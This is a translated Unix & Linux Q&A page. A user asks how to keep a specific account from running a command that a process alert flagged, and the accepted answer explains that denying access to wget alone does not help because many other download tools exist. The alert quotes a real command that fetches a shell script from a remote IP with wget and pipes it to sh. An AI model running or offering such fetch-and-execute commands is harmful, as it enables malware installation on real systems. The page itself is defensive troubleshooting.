首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >问答首页 >进程警报-停止或阻止用户执行此操作

进程警报-停止或阻止用户执行此操作
EN

Unix & Linux用户
提问于 2021-05-21 14:34:29
回答 1查看 35关注 0票数 0

我如何解决这个问题?我已经试过从“Geek日记”上跟踪如何在Linux中禁用特定用户的特定命令

代码语言:javascript
运行
复制
User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

编辑#1

运行getfacl /usr/bin/wget我得到:

代码语言:javascript
运行
复制
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/wget
# owner: root
# group: root
user::rwx
user:clipdrop:---
group::r-x
mask::r-x
other::r-x
EN

回答 1

Unix & Linux用户

回答已采纳

发布于 2021-05-21 20:53:57

在Unix/Linux上,很容易获得替代工具来执行任何恶意行为(下载随机文件、使用curl、任何FTP客户端、使用web浏览器、甚至在emacs中使用web浏览器;从控制版本系统获取源并自行编译;使用Python,它具有大多数“典型”的网络任务,这些任务要么内置在标准库中,要么作为标准库的一部分)。

票数 1
EN
页面原文内容由Unix & Linux提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://unix.stackexchange.com/questions/650784

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档